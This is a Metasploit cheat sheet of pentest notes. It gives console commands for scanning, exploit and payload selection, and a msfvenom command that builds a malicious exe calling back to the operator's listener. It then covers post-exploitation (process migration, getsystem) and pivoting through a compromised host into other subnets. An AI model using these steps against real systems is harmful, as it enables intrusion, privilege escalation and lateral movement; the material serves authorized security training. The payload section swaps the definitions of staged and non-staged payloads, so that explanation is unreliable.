Metasploit

Set up

Create and initialize MSF database:

sudo msfdb init

Enable database service:

sudo systemctl enable postgresql

Run metasploit:

sudo msfconsole

Verify database connectivity

db_status

Get information about metasploit:

help

Workspaces

Creation

Create new workspace:

workspace -a <name>

Move to workspace:

workspace <name>

Check workspace

workspace

Commands inside workspace

Nmap scan:

db_nmap -A <IP>

Get information about the hosts

hosts

Get information about the services

services

Show specific port

services -p <PORT>

Get more commands:

show -h

Auxiliary Modules

Used for information gathering, scanning and enumeration.

List all auxiliary modules:

show auxiliary

Search in auxiliary:

search type:auxiliary <INPUT>

Use auxiliary:

use <ID>

Information about the auxiliary:

info

Show options about the auxiliary:

show options

Run auxiliary:

run

See if metasploit found any vulnerabilities:

vulns

Exploit modules

Search for exploits:

search <SOFTWARE_VERSION>

Show options:

show options

Set payload:

set payload payload/<SYSTEM>/<ARCHITECTURE>/<SHELL_TYPE>

Session and Jobs

Sessions are used to interact and manage access to successfully exploited targets. Jobs are used to run modules for features in the background.

Sessions

Run attack in the background:

Ctrl + Z

List all active attacks:

sessions -l

Enter the session:

sessions -i <ID>

Delete the session:

sessions -k <ID>

Jobs

Run job:

run -j

Payloads

There are two types of payloads: staged and non-staged.

We can recognize staged and non-staged payloads in Metasploit by the character in the payload path: "/" (staged) and "_" (non-staged).

Staged - the payload is sent together with the exploit (more stable, but larger).

Non-staged - the payload is sent in two parts: the first part connects back to us from the machine, the second part transfers the larger payload with the rest of the shellcode and executes it.

Show available payloads:

show payloads

Select payload:

set payload <ID>

Meterpreter

After successfully getting the shell, the user is able to list all available commands:

help

Most common commands

Get information about the system:

sysinfo # system info
getuid # current user

Get shell (you can background the existing shell with Ctrl + Z):

shell

Get shell list:

channel -l

Executable payloads (MSFVenom)

Search for payloads:

msfvenom -l payloads --platform <OS> --arch <PROCESSOR_ARCHITECTURE>

Create malicious exe file:

msfvenom -p <PAYLOAD_PATH> LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe -o <file>.exe

Set up listener with multi/handler:

use multi/handler

Set payload:

set payload <PAYLOAD_PATH>

Meterpreter Post Exploitation

Check idle time:

idletime

Migrate to the other process:

migrate <PID>

Escalate:

getsystem

Get uid:

getuid

Pivoting

If you already have a shell type:

ipconfig

In order to pivot through our compromised host, we first have to send the session to the background:

bg

Next, we add a route in Metasploit (the subnet can be given in CIDR form or as subnet plus netmask):

route add <VICTIM_SUBNET>/<CIDR> <SESSION_ID>

Check the route:

route print

Automatic route add (set SESSION to the pivot session before running):

use post/multi/manage/autoroute

You can scan another host through the pivot with:

use auxiliary/scanner/portscan/tcp

Remember that LHOST must be the IP of the network interface that sits in the other subnet.

Socks proxy:

use auxiliary/server/socks_proxy

You can also create port forwarding:

portfwd -h

Metasploit automation

You can also write your own resource scripts.

Several ready-made resource scripts that can be useful while exploiting machines are located here:

ls -l /usr/share/metasploit-framework/scripts/resource

Execute the script in the following way:

sudo msfconsole -r <SCRIPT>
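As an added example (not part of the original notes), a small resource script that chains the workspace, database scan and enumeration commands from the sections above and records everything to a spool file for later review. `<LAB_HOST>` and the workspace name are placeholders for a lab host you are authorized to scan.

```text
# enum.rc - added example resource script, run with: sudo msfconsole -r enum.rc
# <LAB_HOST> is a placeholder for an authorized lab host
spool /tmp/enum.log
workspace -a lab_enum
workspace lab_enum
db_status
# -Pn skips host discovery so a firewalled lab host is still scanned
db_nmap -A -Pn <LAB_HOST>
# review what the database learned
hosts
services
services -p 445
# follow up on SMB with a version scanner module, non-interactively
use auxiliary/scanner/smb/smb_version
set RHOSTS <LAB_HOST>
run
# anything the modules flagged
vulns
spool off
```

The spool file keeps a timestamped copy of the console output, which is what you hand over in the engagement report.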
